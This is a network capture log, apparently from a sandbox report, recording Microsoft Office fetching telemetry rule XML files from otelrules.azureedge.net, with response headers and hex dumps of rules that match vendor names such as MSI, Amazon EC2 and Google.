2024-11-15 13:10:05 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:05 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: a4cce2d9-d01e-008e-4d40-36387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131005Z-1866b5c5fbbg6vdshC1DFW20h800000001eg000000008k2p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:05 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:05 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:05 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:05 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 140e2611-e01e-003c-3f87-36c70b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131005Z-164f84587bfsgfx9hC1DFWw1as0000000190000000004q5b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:05 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:05 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:05 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:05 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 191b9440-801e-00a3-5a28-377cfb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131005Z-164f84587bf6n6jwhC1DFW90fn00000000cg00000000404e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:05 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:05 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:06 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: a8264c91-f01e-0052-7a79-369224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131006Z-164f84587bfs5tz9hC1DFW9a3w00000001eg000000005sn1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:06 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:06 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:06 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:06 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: d999b00b-501e-008f-5509-379054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131006Z-1866b5c5fbb55pxzhC1DFW1aps000000019000000000bz1h x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:06 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:06 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:06 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 5a7d27ff-801e-0048-0d40-36f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131006Z-16547b76f7fmbrhqhC1DFWkds80000000n90000000004hc5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:06 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:06 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:06 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: aaf2c80b-501e-0029-80c3-36d0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131006Z-164f84587bfpc2cvhC1DFW7gdw000000017g000000003c1d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:06 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:06 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:06 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 0fe31a08-b01e-001e-2cae-360214000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131006Z-1866b5c5fbbt75vghC1DFW0qd4000000016g000000008amt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:06 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:06 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:06 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:06 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 9b217f62-601e-0070-5f87-36a0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131006Z-164f84587bft9l9khC1DFW32rc00000001cg0000000029tq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:06 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:07 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:07 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:07 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 46e97820-b01e-0097-069a-364f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131007Z-164f84587bf2rt9xhC1DFW8drg000000013000000000bhur x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:07 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49811	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:07 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:07 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:07 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 4f50471b-101e-0079-73af-365913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131007Z-16547b76f7fljddfhC1DFWeqbs000000023000000000dbqs x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:07 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:07 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:07 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:07 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 7f17f6e1-501e-00a3-5daf-36c0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131007Z-16547b76f7f7scqbhC1DFW0m5w0000000mxg00000000fz75 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:07 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
